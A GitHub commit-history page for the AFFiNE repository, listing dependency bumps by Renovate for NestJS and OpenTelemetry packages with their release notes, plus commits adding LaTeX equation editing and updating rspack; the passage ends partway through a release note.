Commit Graph

1811 Commits

Author SHA1 Message Date
renovate[bot] d9cebdfc95 chore: bump up nestjs (#14968)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.20/11.1.21?slim=true) |
| [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.20/11.1.21?slim=true) |
| [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.20/11.1.21?slim=true) |
| [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21?slim=true) |
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.4.2` → `11.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.2/11.4.3) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.2/11.4.3?slim=true) |
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.20/11.1.21?slim=true) |

---

### Release Notes

<details>
<summary>nestjs/nest (@nestjs/common)</summary>

### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@nestjs/core)</summary>

### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-express)</summary>

### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-socket.io)</summary>

### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/swagger (@nestjs/swagger)</summary>

### [`v11.4.3`](https://redirect.github.com/nestjs/swagger/compare/11.4.2...0d79a3c9dea89236314609f8b18ec98b12c18692)

[Compare Source](https://redirect.github.com/nestjs/swagger/compare/11.4.2...11.4.3)

</details>

<details>
<summary>nestjs/nest (@nestjs/websockets)</summary>

### [`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 23:39:14 +08:00
renovate[bot] 97d9ae3183 chore: bump up @opentelemetry/semantic-conventions version to v1.41.1 (#14962)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.40.0` → `1.41.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsemantic-conventions/1.41.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1?slim=true) |

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js (@opentelemetry/semantic-conventions)</summary>

### [`v1.41.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 18:25:55 +08:00
Jachin 542da0b347 feat(editor): improve latex editing support (#14924)
## Summary
- support converting selected text into inline LaTeX equations
- support turning text blocks into LaTeX equation blocks
- add equation entries to editor toolbars while keeping inline equation
with text formatting actions

## Tests
- yarn tsc -b blocksuite/affine/inlines/latex/tsconfig.json blocksuite/affine/blocks/note/tsconfig.json blocksuite/affine/blocks/root/tsconfig.json blocksuite/affine/rich-text/tsconfig.json blocksuite/affine/widgets/keyboard-toolbar/tsconfig.json --pretty false
- git diff --check origin/canary...HEAD

## Summary by CodeRabbit

* **New Features**
  * Equation block support with conversion from existing blocks.
  * Inline LaTeX insertion added to the inline formatting toolbar.
  * Equation action added to the keyboard toolbar; Equation blocks searchable via math/equation/latex aliases.

* **Improvements**
  * Inline LaTeX editor opens and syncs more reliably; selection/convert flow preserves distinct LaTeX values when converting in reverse order.

* **Tests**
  * New e2e tests for inline LaTeX conversions and value preservation.

2026-05-14 11:56:54 +08:00
DarkSky 1201f7c350 chore: bump rspack (#14957)
#### PR Dependency Tree


* **PR #14957** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Updated minimum Node version requirement to 22.12.0 or later.
  * Updated build tool dependencies including rspack and related packages.
  * Removed CI-specific logging behavior from development server.
  * Migrated to native HTML plugin integration for improved build efficiency.
  * Simplified build configuration by removing unused experimental options.

2026-05-14 04:18:49 +08:00
renovate[bot] 2b22fe4692 chore: bump up nestjs (#13791)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) | [`13.2.4` → `13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.2.4/13.4.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fapollo/13.4.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fapollo/13.2.4/13.4.0?slim=true) |
| [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.18/11.1.20?slim=true) |
| [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.18/11.1.20?slim=true) |
| [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) | [`13.2.5` → `13.4.0`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.2.5/13.4.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fgraphql/13.4.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fgraphql/13.2.5/13.4.0?slim=true) |
| [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.18/11.1.20?slim=true) |
| [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20?slim=true) |
| [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) | [`6.1.1` → `6.1.3`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.1.1/6.1.3) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fschedule/6.1.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fschedule/6.1.1/6.1.3?slim=true) |
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.2.7` → `11.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.2.7/11.4.2) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.2.7/11.4.2?slim=true) |
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.18/11.1.20) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.20?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.18/11.1.20?slim=true) |

---

### Release Notes

<details>
<summary>nestjs/graphql (@nestjs/apollo)</summary>

### [`v13.4.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.0)

[Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.3.0...v13.4.0)

#### 13.4.0 (2026-04-30)

##### Features

- `apollo`, `graphql`, `mercurius`
  - [#3811](https://redirect.github.com/nestjs/graphql/pull/3811) feat(graphql): Add registerIn option for module-scoped type filtering ([@joe-re](https://redirect.github.com/joe-re))

##### Bug fixes

- `graphql`
  - [#3959](https://redirect.github.com/nestjs/graphql/pull/3959) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): stop double-registering PickType inputs ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3960](https://redirect.github.com/nestjs/graphql/pull/3960) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): de-duplicate per-target metadata in TargetMetadataCollection ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- `apollo`, `graphql`
  - [#3962](https://redirect.github.com/nestjs/graphql/pull/3962) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): restore Timestamp scalar parsers in federation factory ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Enhancements

- `graphql`
  - [#3963](https://redirect.github.com/nestjs/graphql/pull/3963) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): validate registerEnumType/createUnionType options eagerly ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
  - [#3954](https://redirect.github.com/nestjs/graphql/pull/3954) fix(deps): update graphql-tools monorepo ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Masato Noguchi ([@joe-re](https://redirect.github.com/joe-re))
- Mateus Welter Goettems ([@mateuswgoettems](https://redirect.github.com/mateuswgoettems))
- Yogeshwaran C ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

### [`v13.3.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.3.0)

[Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.5...v13.3.0)

#### 13.3.0 (2026-04-22)

##### Bug fixes

- `graphql`
  - [#3949](https://redirect.github.com/nestjs/graphql/pull/3949) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): count args for parenless arrow functions ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3952](https://redirect.github.com/nestjs/graphql/pull/3952) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): keep class directive when a field has the same SDL ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3946](https://redirect.github.com/nestjs/graphql/pull/3946) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): emit enum key for Args defaultValue in generated SDL ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3934](https://redirect.github.com/nestjs/graphql/pull/3934) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): treat single-key string enums as enums in plugin type detection ([@maruthang](https://redirect.github.com/maruthang))
  - [#3939](https://redirect.github.com/nestjs/graphql/pull/3939) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): preserve ResolveField options for all overloads ([@maruthang](https://redirect.github.com/maruthang))
- `apollo`
  - [#3940](https://redirect.github.com/nestjs/graphql/pull/3940) fix(apollo): preserve HTTP 200 for execution-level GraphQL errors ([@maruthang](https://redirect.github.com/maruthang))

##### Enhancements

- `graphql`
  - [#3838](https://redirect.github.com/nestjs/graphql/pull/3838) perf(graphql): bypass ExternalContextCreator for scalar ResolveField fast-path ([@ArielSafar](https://redirect.github.com/ArielSafar))
  - [#3950](https://redirect.github.com/nestjs/graphql/pull/3950) feat([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): forward specifiedByURL and extensions on custom scalars ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3951](https://redirect.github.com/nestjs/graphql/pull/3951) feat([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): accept array of SDL strings in [@Directive](https://redirect.github.com/Directive) ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3944](https://redirect.github.com/nestjs/graphql/pull/3944) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): emit clearer error when nested object type is used in mapped input ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3943](https://redirect.github.com/nestjs/graphql/pull/3943) feat([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): add conditional exports for browser shim ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3942](https://redirect.github.com/nestjs/graphql/pull/3942) feat([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): default federation to v2.12 directives ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
  - [#3936](https://redirect.github.com/nestjs/graphql/pull/3936) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): allow CustomScalar methods to return null ([@maruthang](https://redirect.github.com/maruthang))
- `apollo`, `graphql`
  - [#3948](https://redirect.github.com/nestjs/graphql/pull/3948) feat([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): support directives on enums and unions ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Dependencies

- `graphql`
  - [#3925](https://redirect.github.com/nestjs/graphql/pull/3925) chore(deps): update dependency ts-morph to v28 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3918](https://redirect.github.com/nestjs/graphql/pull/3918) fix(deps): update graphql-tools monorepo ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
  - [#3928](https://redirect.github.com/nestjs/graphql/pull/3928) chore(deps): update dependency fastify to v5.8.5 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3858](https://redirect.github.com/nestjs/graphql/pull/3858) chore(deps): update dependency [@mercuriusjs/gateway](https://redirect.github.com/mercuriusjs/gateway) to v5.2.0 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3920](https://redirect.github.com/nestjs/graphql/pull/3920) chore(deps): update dependency mercurius to v16.9.0 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 3

- Ariel Safar ([@ArielSafar](https://redirect.github.com/ArielSafar))
- Maruthan G ([@maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C ([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

### [`v13.2.5`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.2.5)

[Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.4...v13.2.5)

##### 13.2.5 (2026-04-09)

##### Bug fixes

- `graphql`
  - [#3846](https://redirect.github.com/nestjs/graphql/pull/3846) fix([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): handle definitions factory typename option ([@NicolasGn](https://redirect.github.com/NicolasGn))

##### Enhancements

- `graphql`
  - [#3889](https://redirect.github.com/nestjs/graphql/pull/3889) feat([@nestjs/graphql](https://redirect.github.com/nestjs/graphql)): add stopOnApplicationShutdown option for graceful shutdown ([@dgfh0450](https://redirect.github.com/dgfh0450))

##### Dependencies

- `graphql`
  - [#3894](https://redirect.github.com/nestjs/graphql/pull/3894) fix(deps): update dependency graphql-ws to v6.0.8 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3852](https://redirect.github.com/nestjs/graphql/pull/3852) chore(deps): update dependency graphql to v16.13.2 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3888](https://redirect.github.com/nestjs/graphql/pull/3888) fix(deps): update dependency ws to v8.20.0 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3901](https://redirect.github.com/nestjs/graphql/pull/3901) fix(deps): update dependency [@nestjs/mapped-types](https://redirect.github.com/nestjs/mapped-types) to v2.1.1 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3904](https://redirect.github.com/nestjs/graphql/pull/3904) fix(deps): update dependency lodash to v4.18.1 \[security] ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `apollo`
  - [#3902](https://redirect.github.com/nestjs/graphql/pull/3902) fix(deps): update dependency lodash.omit to v4.18.0 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3897](https://redirect.github.com/nestjs/graphql/pull/3897) chore(deps): update dependency [@apollo/server](https://redirect.github.com/apollo/server) to v5.5.0 \[security] ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3881](https://redirect.github.com/nestjs/graphql/pull/3881) chore(deps): update dependency [@apollo/gateway](https://redirect.github.com/apollo/gateway) to v2.10.5 \[security] ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
- `mercurius`
  - [#3899](https://redirect.github.com/nestjs/graphql/pull/3899) chore(deps): update dependency [@mercuriusjs/federation](https://redirect.github.com/mercuriusjs/federation) to v5.1.1 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3890](https://redirect.github.com/nestjs/graphql/pull/3890) chore(deps): update dependency fastify to v5.8.4 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))
  - [#3868](https://redirect.github.com/nestjs/graphql/pull/3868) chore(deps): update dependency mercurius to v16.8.0 ([@renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 2

- Nicolas Guégan ([@NicolasGn](https://redirect.github.com/NicolasGn))
- YoonDH ([@dgfh0450](https://redirect.github.com/dgfh0450))

</details>

<details>
<summary>nestjs/nest (@nestjs/common)</summary>

### [`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
  - [#16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@burhanharoon](https://redirect.github.com/burhanharoon))
  - [#16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon ([@burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@nestjs/core)</summary>

### [`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
  - [#16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@burhanharoon](https://redirect.github.com/burhanharoon))
  - [#16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon ([@burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-express)</summary>

### [`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

##### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
  - [#16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@burhanharoon](https://redirect.github.com/burhanharoon))
  - [#16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

- Burhan Haroon ([@burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-socket.io)</summary>

### [`v11.1.20`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.20)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20)

##### v11.1.20 (2026-05-13)

##### Bug fixes

- `core`, `testing`
  - [#16939](https://redirect.github.com/nestjs/nest/pull/16939) fix(core): fix deeply nested transient providers resolution ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- `core`
  - [#16861](https://redirect.github.com/nestjs/nest/pull/16861) fix(core): fix [@Sse](https://redirect.github.com/Sse) losing events on complete ([@MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer))
  - [#16753](https://redirect.github.com/nestjs/nest/pull/16753) fix(core): defer sse writehead until after lifecycle completes ([@jkalberer](https://redirect.github.com/jkalberer))
  - [#16782](https://redirect.github.com/nestjs/nest/pull/16782) fix(core): use strict null check for SSE message id ([@burhanharoon](https://redirect.github.com/burhanharoon))
- `microservices`
  - [#16850](https://redirect.github.com/nestjs/nest/pull/16850) fix(microservices): ServerRMQ crashes at boot when [@MessagePattern](https://redirect.github.com/MessagePattern)(undefined) is combined with wildcards: true ([@lavieennoir](https://redirect.github.com/lavieennoir))
- `common`
  - [#16845](https://redirect.github.com/nestjs/nest/pull/16845) fix(common): accept zero timestamp in parse date pipe ([@Mysh3ll](https://redirect.github.com/Mysh3ll))
- `platform-socket.io`
  - [#16742](https://redirect.github.com/nestjs/nest/pull/16742) fix(socket.io): Deduplicate disconnect listener in bindMessageHandlers ([@fru1tworld](https://redirect.github.com/fru1tworld))

##### Enhancements

- `microservices`
  - [#16676](https://redirect.github.com/nestjs/nest/pull/16676) feat(microservices): add return buffers option for binary data ([@Forceres](https://redirect.github.com/Forceres))
  - [#16826](https://redirect.github.com/nestjs/nest/pull/16826) feat(microservices): handle rmq blocked/unblocked connection events ([@thisalihassan](https://redirect.github.com/thisalihassan))
- `common`
  - [#16902](https://redirect.github.com/nestjs/nest/pull/16902) fix(common): filetype validator buffer message ([@QusaiAlbonni](https://redirect.github.com/QusaiAlbonni))
- `platform-express`
  - [#16844](https://redirect.github.com/nestjs/nest/pull/16844) feat(platform-express): add defParamCharset to MulterOptions ([@starnayuta](https://redirect.github.com/starnayuta))

##### Dependencies

- `platform-ws`
  - [#16941](https://redirect.github.com/nestjs/nest/pull/16941) chore(deps): bump ws from 8.20.0 to 8.20.1 ([@dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 13

- Ali Hassan ([@thisalihassan](https://redirect.github.com/thisalihassan))
- Burhan Haroon ([@burhanharoon](https://redirect.github.com/burhanharoon))
- Dmytro Khyzhniak ([@lavieennoir](https://redirect.github.com/lavieennoir))
- Harsh Rathod ([@harshrathod50](https://redirect.github.com/harshrathod50))
- IlyaCredo ([@Forceres](https://redirect.github.com/Forceres))
- Kamil Mysliwiec ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Mysh3ll ([@Mysh3ll](https://redirect.github.com/Mysh3ll))
- [@MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer)
- [@QusaiAlbonni](https://redirect.github.com/QusaiAlbonni)
- [@jkalberer](https://redirect.github.com/jkalberer)
- [@pazaderey](https://redirect.github.com/pazaderey)
- fru1tworld ([@fru1tworld](https://redirect.github.com/fru1tworld))
- starnayuta ([@starnayuta](https://redirect.github.com/starnayuta))

### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19)

[Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19)

#### v11.1.19 (2026-04-13)

##### Bug fixes

- `microservices`
  - [#16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@burhanharoon](https://redirect.github.com/burhanharoon))
  - [#16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Committers: 2

